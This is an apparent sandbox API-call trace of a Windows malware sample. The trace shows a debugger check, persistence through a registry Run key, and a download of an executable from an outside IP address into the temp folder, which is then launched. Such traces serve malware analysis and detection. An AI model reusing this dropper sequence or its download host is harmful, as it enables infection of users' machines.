KERNEL32!GetProcAddress (0x7C800000,"SetFilePointer")
KERNEL32!GetProcAddress (0x7C800000,"SetEndOfFile")
KERNEL32!GetProcAddress (0x7C800000,"HeapCreate")
KERNEL32!GetProcAddress (0x7C800000,"VirtualFree")
KERNEL32!GetProcAddress (0x7C800000,"VirtualAlloc")
KERNEL32!GetProcAddress (0x7C800000,"HeapReAlloc")
KERNEL32!GetProcAddress (0x7C800000,"IsBadWritePtr")
KERNEL32!GetModuleHandleA ("USER32.dll")
KERNEL32!GetProcAddress (0x77D30000,"wsprintfA")
KERNEL32!GetModuleHandleA ("ADVAPI32.dll")
KERNEL32!GetProcAddress (0x77DC0000,"RegOpenKeyExA")
KERNEL32!GetProcAddress (0x77DC0000,"RegSetValueExA")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x00077DC2
KERNEL32!GetProcAddress (0x77DC0000,"RegDeleteValueA")
KERNEL32!GetProcAddress (0x77DC0000,"RegQueryValueExA")
KERNEL32!GetProcAddress (0x77DC0000,"RegCloseKey")
KERNEL32!GetModuleHandleA ("WS2_32.dll")
KERNEL32!GetProcAddress (0x733B0000,00115)
KERNEL32!GetProcAddress (0x733B0000,00116)
KERNEL32!GetProcAddress (0x733B0000,00052)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x000733B1
KERNEL32!GetModuleHandleA ("RASAPI32.dll")
KERNEL32!GetProcAddress (0x76ED0000,"RasEnumDevicesA")
KERNEL32!GetProcAddress (0x76ED0000,"RasEnumEntriesA")
KERNEL32!GetProcAddress (0x76ED0000,"RasGetEntryPropertiesA")
KERNEL32!GetModuleHandleA ("urlmon.dll")
KERNEL32!GetProcAddress (0x77250000,"URLDownloadToFileA")
KERNEL32!GetModuleHandleA ("KERNEL32")
KERNEL32!GetProcAddress (0x7C800000,"IsDebuggerPresent")
KERNEL32!IsDebuggerPresent ()
KERNEL32!GetVersion ()
KERNEL32!HeapCreate (0x00000000,0x00001000,0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00405015 accessing page 0x0000040F
KERNEL32!HeapAlloc (0x00000001,0x00000000,0x00000140)
KERNEL32!InitializeCriticalSection (0x0040E398)
KERNEL32!InitializeCriticalSection (0x0040E3C8)
KERNEL32!InitializeCriticalSection (0x0040E3B0)
KERNEL32!InitializeCriticalSection (0x0040E380)
KERNEL32!TlsAlloc ()
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!HeapAlloc (0x00000001,0x00000008,0x000041C4)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073024
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073021
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073022
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073023
KERNEL32!VirtualAlloc (0x00000000,0x00100000,0x00002000,0x00000004)
KERNEL32!VirtualAlloc (0x20000000,0x00008000,0x00001000,0x00000004)
PageFault tbl process 0x00000100 - 0x00000008 entries, 0x0053005C-0x00530059. fhandle=0xFFFFFFFF.
|offset 0x20000000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20001000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20002000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20003000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20004000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20005000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20006000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20007000, seek 0x00000000, size 0x00001000, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004057F6 accessing page 0x00020000
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004057F6 accessing page 0x00020001
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004057F6 accessing page 0x00020002
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004057F6 accessing page 0x00020003
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004057F6 accessing page 0x00020004
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004057F6 accessing page 0x00020005
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004057F6 accessing page 0x00020006
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004057F6 accessing page 0x00020007
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!TlsSetValue (0x00000001,0x20000F80)
KERNEL32!GetCurrentThreadId()
KERNEL32!HeapAlloc (0x00000001,0x00000000,0x00000480)
KERNEL32!GetStartupInfoA (0x4FFD0B24)
KERNEL32!GetStdHandle (0xFFFFFFF6)
KERNEL32!GetStdHandle (0xFFFFFFF5)
KERNEL32!GetStdHandle (0xFFFFFFF4)
KERNEL32!SetHandleCount (0x00000020)
KERNEL32!GetCommandLineA ()
KERNEL32!GetEnvironmentStringsW ()
KERNEL32!GetEnvironmentStrings ()
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!FreeEnvironmentStringsA ("=C:=C:\WINDOWS")
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E398)
KERNEL32!InitializeCriticalSection (0x20000E60)
KERNEL32!LeaveCriticalSection (0x0040E398)
KERNEL32!EnterCriticalSection (0x20000E60)
KERNEL32!GetACP ()
KERNEL32!GetCPInfo (0x000004E4,0x4FFD0B30)
KERNEL32!GetCPInfo (0x000004E4,0x4FFD0B08)
KERNEL32!GetStringTypeW (0x00000001,0x0040A5A0,0x00000001,0x4FFD05C4)
KERNEL32!GetStringTypeA (0x00000000,0x00000001,0x0040E314,0x00000001,0x4FFD05C4)
KERNEL32!LCMapStringW (0x00000000,0x00000100,0x0040A5A0,0x00000001,0x00000000,0x00000000)
KERNEL32!MultiByteToWideChar (0x000004E4,0x00000001,0x4FFD0A08,0x00000100,0x00000000,0x00000000)
KERNEL32!MultiByteToWideChar (0x000004E4,0x00000001,0x4FFD0A08,0x00000100,0x4FFD0388,0x00000100)
KERNEL32!LCMapStringW (0x00000000,0x00000100,0x4FFD0388,0x00000100,0x00000000,0x00000000)
KERNEL32!LCMapStringW (0x00000000,0x00000100,0x4FFD0388,0x00000100,0x4FFD0384,0x00000001)
KERNEL32!WideCharToMultiByte (0x000004E4,0x00000220,0x4FFD0384,0x00000001,0x4FFD0908,0x00000100,0x00000000,0x00000000)
KERNEL32!MultiByteToWideChar (0x000004E4,0x00000001,0x4FFD0A08,0x00000100,0x00000000,0x00000000)
KERNEL32!MultiByteToWideChar (0x000004E4,0x00000001,0x4FFD0A08,0x00000100,0x4FFD0368,0x00000100)
KERNEL32!LCMapStringW (0x00000000,0x00000200,0x4FFD0368,0x00000100,0x00000000,0x00000000)
KERNEL32!LCMapStringW (0x00000000,0x00000200,0x4FFD0368,0x00000100,0x4FFD0364,0x00000001)
KERNEL32!WideCharToMultiByte (0x000004E4,0x00000220,0x4FFD0364,0x00000001,0x4FFD0808,0x00000100,0x00000000,0x00000000)
KERNEL32!LeaveCriticalSection (0x20000E60)
KERNEL32!GetModuleFileNameA (0x00000000,0x0040E3F0,0x00000104)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!HeapAlloc (0x00000001,0x00000008,0x00000800)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073025
KERNEL32!SetUnhandledExceptionFilter (0x00407498)
KERNEL32!GetStartupInfoA (0x4FFD0B8C)
KERNEL32!GetModuleHandleA (NULL)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x0040158A accessing page 0x0004FFCF
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x77DC32F5 accessing page 0x00077DC1
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x77DC1014 accessing page 0x00077DC4
ADVAPI32!RegOpenKeyExA (0x80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion",0x00000000,0x000F003F,0x4FFCFF58)
PageFault tbl process 0x00000000 - 0x00000006 entries, 0x00000000-0x00000000. fhandle=0x72004640.
|offset 0x7000A000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x7000B000, seek 0x00001000, size 0x00001000, flags=0x00000000
|offset 0x7000C000, seek 0x00002000, size 0x00001000, flags=0x00000000
|offset 0x7000D000, seek 0x00003000, size 0x00001000, flags=0x00000000
|offset 0x7000E000, seek 0x00004000, size 0x00001000, flags=0x00000000
|offset 0x7000F000, seek 0x00005000, size 0x00001000, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0004D6B accessing page 0x0007000F
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0004D6B accessing page 0x0007000E
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0004D6B accessing page 0x0007000D
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0004D6B accessing page 0x0007000C
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0004D6B accessing page 0x0007000B
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0004D6B accessing page 0x0007000A
ADVAPI32!RegQueryValueExA (0x72004688,"dmix",0x00000000,0x00000000,0x4FFCFF74,0x4FFCFF4C)
ADVAPI32!RegCloseKey (0x72004688)
KERNEL32!GetLocalTime (0x4FFCFF30)
KERNEL32!GetSystemTime (0x4FFCFF20)
KERNEL32!GetTimeZoneInformation (0x4FFCFE74)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E398)
KERNEL32!InitializeCriticalSection (0x20000F60)
KERNEL32!LeaveCriticalSection (0x0040E398)
KERNEL32!EnterCriticalSection (0x20000F60)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E398)
KERNEL32!InitializeCriticalSection (0x20000F40)
KERNEL32!LeaveCriticalSection (0x0040E398)
KERNEL32!EnterCriticalSection (0x20000F40)
KERNEL32!LeaveCriticalSection (0x20000F40)
KERNEL32!GetTimeZoneInformation (0x0040E530)
KERNEL32!WideCharToMultiByte (0x00000000,0x00000220,0x0040E534,0xFFFFFFFF,0x0040DFDC,0x0000003F,0x00000000,0x4FFCFE10)
KERNEL32!WideCharToMultiByte (0x00000000,0x00000220,0x0040E588,0xFFFFFFFF,0x0040E01C,0x0000003F,0x00000000,0x4FFCFE10)
KERNEL32!LeaveCriticalSection (0x20000F60)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
ADVAPI32!RegOpenKeyExA (0x80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion",0x00000000,0x000F003F,0x4FFCFF50)
ADVAPI32!RegSetValueExA (0x72004A70,"dmix",0x00000000,0x00000004,"",0x00000004)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072006
ADVAPI32!RegCloseKey (0x72004A70)
ADVAPI32!RegOpenKeyExA (0x80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion",0x00000000,0x000F003F,0x4FFCFF58)
ADVAPI32!RegQueryValueExA (0x72004A94,"Dvalx",0x00000000,0x00000000,0x4FFCFF3C,0x4FFCFF38)
ADVAPI32!RegCloseKey (0x72004A94)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x733B1014 accessing page 0x000733B4
WS2_32!WSAStartup (0x00000101,0x4FFD01D0)
KERNEL32!GetProcessHeap ()
KERNEL32!HeapAlloc (0x00000005,0x00000000,0x00000098)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x76ED19DC accessing page 0x00076ED2
RASAPI32!RasEnumDevicesA (0x73025662,0x4FFCFF28,0x4FFCFF24)
KERNEL32!GetProcessHeap ()
KERNEL32!HeapFree (0x00000005,0x00000000,0x73025662)
KERNEL32!GetProcessHeap ()
KERNEL32!HeapAlloc (0x00000005,0x00000000,0x00000098)
RASAPI32!RasEnumDevicesA (0x73025662,0x4FFCFF28,0x4FFCFF24)
KERNEL32!GetProcessHeap ()
KERNEL32!HeapFree (0x00000005,0x00000000,0x73025662)
ADVAPI32!RegOpenKeyExA (0x80000002,"Software\Microsoft\Windows\CurrentVersion\Run",0x00000000,0x000F003F,0x4FFCFF50)
ADVAPI32!RegSetValueExA (0x72004CCF,"scrbmk",0x00000000,0x00000001,""C:\SAMPLE.EXE"",0x0000000F)
ADVAPI32!RegCloseKey (0x72004CCF)
WS2_32!gethostbyname ("www.google.com")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7335373B accessing page 0x00073358
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x73352780 accessing page 0x00073354
WS2_32!gethostbyname ("www.google.com")
KERNEL32!GetTempPathA (0x00000800,0x4FFCF758)
KERNEL32!GetFileAttributesA ("C:\WINDOWS\TEMP\ac3275.exe")
KERNEL32!GetLastError ()
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!DeleteFileA ("C:\WINDOWS\TEMP\ac3275.exe")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x77252AE6 accessing page 0x00077253
URLMON!URLDownloadToFileA (0x00000000,"http://200.73.174.182/5/x.y","C:\WINDOWS\TEMP\ac3275.exe",0x00000000,0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x77D36073 accessing page 0x00077D34
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x77D34E90 accessing page 0x00077D37
USER32!wsprintfA (0x4FFCF2C4,"Downloads file from %s as %s",0x4FFD00A4....)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072007
KERNEL32!CreateFileA ("C:\WINDOWS\TEMP\ac3275.exe",0x00000000,0x00000000,0x00000000,0x00000002,0x00000000,0x00000000)
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!WriteFile (0x00000020,0x7725301E,0x00001000,0x4FFCF6C4,0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00085BC accessing page 0x00077254
KERNEL32!CloseHandle (0x00000020)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E398)
KERNEL32!InitializeCriticalSection (0x20000F20)
KERNEL32!LeaveCriticalSection (0x0040E398)
KERNEL32!EnterCriticalSection (0x20000F20)
KERNEL32!EnterCriticalSection (0x0040E398)
KERNEL32!InitializeCriticalSection (0x73024A3A)
KERNEL32!LeaveCriticalSection (0x0040E398)
KERNEL32!EnterCriticalSection (0x73024A3A)
KERNEL32!LeaveCriticalSection (0x20000F20)
KERNEL32!CreateFileA ("C:\WINDOWS\TEMP\ac3275.exe",0x80000000,0x00000003,0x4FFCF6A8,0x00000003,0x00000080,0x00000000)
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!GetFileType (0x00000020)
KERNEL32!LeaveCriticalSection (0x73024A3A)
KERNEL32!EnterCriticalSection (0x73024A3A)
KERNEL32!ReadFile (0x00000020,0x4FFCF6F8,0x00000001,0x4FFCF6B0,0x00000000)
KERNEL32!HeapAlloc (0x00000000,0x00000000,0x00001010)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073026
KERNEL32!LeaveCriticalSection (0x73024A3A)
KERNEL32!EnterCriticalSection (0x73024A3A)
KERNEL32!CloseHandle (0x00000020)
KERNEL32!HeapFree (0x00000000,0x00000000,0x73025702)
KERNEL32!LeaveCriticalSection (0x73024A3A)
KERNEL32!CreateProcessA (NULL,"C:\WINDOWS\TEMP\ac3275.exe",0x00000000,0x00000000,0x00000001,0x00000000,0x00000000,0x00000000,0x4FFCF714,0x4FFCF704)
KERNEL32!_lopen ("C:\WINDOWS\TEMP\ac3275.exe",0x00000000)
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!CloseHandle (0x00000020)
KERNEL32!InternalExec ("C:\WINDOWS\TEMP\ac3275.exe",0x4FFCF704,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070010
PageFault tbl process 0x00000101 - 0x00000005 entries, 0x00000000-0x00000000. fhandle=0x72004D83.
|offset 0x00400000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x00401000, seek 0x00000600, size 0x00000200, flags=0x00000000
|offset 0x00402000, seek 0x00000800, size 0x00000200, flags=0x00000000
|offset 0x00403000, seek 0x00000A00, size 0x00000200, flags=0x00000000
|offset 0x00404000, seek 0x00000C00, size 0x00000200, flags=0x00000008
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000101 - cs:eip 0x002B:0x7C8034F3 accessing page 0x00000403
KERNEL32!LoadLibraryA ("user32.dll")
KERNEL32!GetModuleHandleA ("user32.dll")
**PAGE FAULT: process 0x00000101 - cs:eip 0x002B:0x7C802DD2 accessing page 0x0004FFCE
KERNEL32!GetProcAddress (0x77D30000,"MessageBoxA")
KERNEL32!LoadLibraryA ("kernel32.dll")
KERNEL32!GetModuleHandleA ("kernel32.dll")
KERNEL32!GetProcAddress (0x7C800000,"ExitProcess")
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000101 - cs:eip 0x002B:0x7C802FEA accessing page 0x00000400
KERNEL32!CreateThread (0x00000000,0x00000000,0x00401000,0x7C8010C3,0x00000000,0x4FFCF270)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000101 - cs:eip 0x002B:0x7C801541 accessing page 0x00000401
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000101 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FFB1
KERNEL32!LeaveCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000101 - cs:eip 0x002B:0x0040105B accessing page 0x00000402
KERNEL32!ExitProcess (0x00000000)
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!Sleep (0x00000BB8)
KERNEL32!GetSystemTime (0x4FFCFF48)
ADVAPI32!RegOpenKeyExA (0x80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion",0x00000000,0x000F003F,0x4FFCFF40)
ADVAPI32!RegSetValueExA (0x72004E2A,"Dvalx",0x00000000,0x00000004,"A",0x00000004)
ADVAPI32!RegCloseKey (0x72004E2A)
WS2_32!WSACleanup ()
KERNEL32!EnterCriticalSection (0x0040E3C8)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E398)
KERNEL32!InitializeCriticalSection (0x20000F00)
KERNEL32!LeaveCriticalSection (0x0040E398)
KERNEL32!EnterCriticalSection (0x20000F00)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E398)
KERNEL32!InitializeCriticalSection (0x20000EE0)
KERNEL32!LeaveCriticalSection (0x0040E398)
KERNEL32!EnterCriticalSection (0x20000EE0)
KERNEL32!LeaveCriticalSection (0x20000EE0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E398)
KERNEL32!InitializeCriticalSection (0x20000EC0)
KERNEL32!LeaveCriticalSection (0x0040E398)
KERNEL32!EnterCriticalSection (0x20000EC0)
KERNEL32!LeaveCriticalSection (0x20000EC0)
KERNEL32!EnterCriticalSection (0x0040E3B0)
KERNEL32!LeaveCriticalSection (0x0040E3B0)
KERNEL32!EnterCriticalSection (0x0040E398)
KERNEL32!InitializeCriticalSection (0x20000EA0)
KERNEL32!LeaveCriticalSection (0x0040E398)
KERNEL32!EnterCriticalSection (0x20000EA0)
KERNEL32!LeaveCriticalSection (0x20000EA0)
KERNEL32!LeaveCriticalSection (0x20000F00)
KERNEL32!SetUnhandledExceptionFilter (0x00000000)
KERNEL32!ExitProcess (0x00000000)
KERNEL32!_lopen ("C:\SAMPLE.WMF",0x00000000)
KERNEL32!GetModuleHandleA ("ADVAPI32.DLL")
KERNEL32!GetProcAddress (0x77DC0000,"RegOpenKeyA")
KERNEL32!GetProcAddress (0x77DC0000,"RegEnumValueA")
ADVAPI32!RegOpenKeyA (0x80000002,"Software\Microsoft\Windows\CurrentVersion\Run",0x04FFFE2E)
ADVAPI32!RegEnumValueA (0x72004E9E,0x00000002,0x04FFFD2E,0x04FFFC2A,0x00000000,0x00000000,0x04FFFC2E,0x04FFFC26)
KERNEL32!_lopen (""C:\SAMPLE.EXE"",0x00000000)
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!CloseHandle (0x00000020)
KERNEL32!WinExec (""C:\SAMPLE.EXE"",0x00000000)
KERNEL32!InternalExec (""C:\SAMPLE.EXE"",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070011
PageFault tbl process 0x00000102 - 0x0000001B entries, 0x00000000-0x00000000. fhandle=0x7200267F.
|offset 0x00400000, seek 0x00000000, size 0x00000200, flags=0x00000004
|offset 0x00401000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00402000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00403000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00404000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00405000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00406000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00407000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00408000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00409000, seek 0xFFFFFFFF, size 0x000001BA, flags=0x00000000
|offset 0x0040A000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0040B000, seek 0xFFFFFFFF, size 0x00000052, flags=0x00000000
|offset 0x0040C000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0040D000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0040E000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0040F000, seek 0xFFFFFFFF, size 0x00000A00, flags=0x00000000
|offset 0x00410000, seek 0x00000200, size 0x00001000, flags=0x00000000
|offset 0x00411000, seek 0x00001200, size 0x00001000, flags=0x00000000
|offset 0x00412000, seek 0x00002200, size 0x00001000, flags=0x00000000
|offset 0x00413000, seek 0x00003200, size 0x00001000, flags=0x00000000
|offset 0x00414000, seek 0x00004200, size 0x00001000, flags=0x00000000
|offset 0x00415000, seek 0x00005200, size 0x00001000, flags=0x00000000
|offset 0x00416000, seek 0x00006200, size 0x00001000, flags=0x00000000
|offset 0x00417000, seek 0x00007200, size 0x00000E00, flags=0x00000000
|offset 0x00418000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00419000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0041A000, seek 0xFFFFFFFF, size 0x00000194, flags=0x00000008
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000102 - cs:eip 0x002B:0x7C8034F3 accessing page 0x00000416
KERNEL32!LoadLibraryA ("KERNEL32.dll")
KERNEL32!GetModuleHandleA ("KERNEL32.dll")
KERNEL32!GetProcAddress (0x7C800000,"GetModuleHandleA")
**PAGE FAULT: process 0x00000102 - cs:eip 0x002B:0x7C803582 accessing page 0x00000410
KERNEL32!GetProcAddress (0x7C800000,"GetProcAddress")
KERNEL32!LoadLibraryA ("USER32.dll")
KERNEL32!GetModuleHandleA ("USER32.dll")
KERNEL32!LoadLibraryA ("ADVAPI32.dll")
KERNEL32!GetModuleHandleA ("ADVAPI32.dll")
KERNEL32!LoadLibraryA ("WS2_32.dll")
KERNEL32!GetModuleHandleA ("WS2_32.dll")
KERNEL32!LoadLibraryA ("RASAPI32.dll")
KERNEL32!GetModuleHandleA ("RASAPI32.dll")
KERNEL32!LoadLibraryA ("urlmon.dll")
KERNEL32!GetModuleHandleA ("urlmon.dll")
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000102 - cs:eip 0x002B:0x7C802FEA accessing page 0x00000400
KERNEL32!CreateThread (0x00000000,0x00000000,0x0041000C,0x7C8010C3,0x00000000,0x04FFFADA)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000102 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FF92
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!GetModuleHandleA ("KERNEL32")
KERNEL32!GetProcAddress (0x7C800000,"VirtualProtect")
KERNEL32!VirtualProtect (0x00400138,0x000000A0,0x00000040,0x4FF923D4)
KERNEL32!VirtualProtect (0x00401000,0x000081BA,0x00000040,0x4FF923D4)
KERNEL32!VirtualProtect (0x0040A000,0x00001052,0x00000040,0x4FF923D4)
KERNEL32!VirtualProtect (0x0040C000,0x00003A00,0x00000040,0x4FF923D4)
KERNEL32!VirtualProtect (0x00410000,0x0000A194,0x00000040,0x4FF923D4)
**PAGE FAULT: process 0x00000102 - cs:eip 0x002B:0x00410223 accessing page 0x00000417
**PAGE FAULT: process 0x00000102 - cs:eip 0x002B:0x00410223 accessing page 0x00000418
**PAGE FAULT: process 0x00000102 - cs:eip 0x002B:0x0041020F accessing page 0x00000419
KERNEL32!GetModuleHandleA ("KERNEL32")
KERNEL32!GetProcAddress (0x7C800000,"LocalAlloc")
KERNEL32!GetProcAddress (0x7C800000,"LocalFree")
KERNEL32!GetProcAddress (0x7C800000,"RtlMoveMemory")
KERNEL32!GetProcAddress (0x7C800000,"RtlZeroMemory")
**PAGE FAULT: process 0x00000102 - cs:eip 0x002B:0x00419681 accessing page 0x0000041A
KERNEL32!LocalAlloc (0x00000040,0x00000480)
KERNEL32!LocalAlloc (0x00000040,0x00000480)
KERNEL32!RtlZeroMemory (0x4FF92300,0x00000040)
KERNEL32!RtlZeroMemory (0x4FF92300,0x00000040)
KERNEL32!LocalFree (0x730261D2)
KERNEL32!LocalFree (0x73025D4A)
KERNEL32!LocalAlloc (0x00000040,0x00001680)
**PAGE FAULT: process 0x00000102 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073027
KERNEL32!LocalAlloc (0x00000040,0x00008000)
**PAGE FAULT: process 0x00000102 - cs:eip 0x002B:0x7C80D8AF accessing page 0x0007302F
**PAGE FAULT: process 0x00000102 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073028
KERNEL32!LeaveCriticalSection (0x00000000)
ADVAPI32!RegEnumValueA (0x72004E9E,0x00000003,0x04FFFD2E,0x04FFFC2A,0x00000000,0x00000000,0x04FFFC2E,0x04FFFC26)
KERNEL32!GetModuleHandleA ("ADVAPI32.DLL")
KERNEL32!GetProcAddress (0x77DC0000,"RegOpenKeyA")
KERNEL32!GetProcAddress (0x77DC0000,"RegEnumValueA")
ADVAPI32!RegOpenKeyA (0x80000001,"Software\Microsoft\Windows\CurrentVersion\Run",0x04FFFE2E)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003220 accessing page 0x00072008
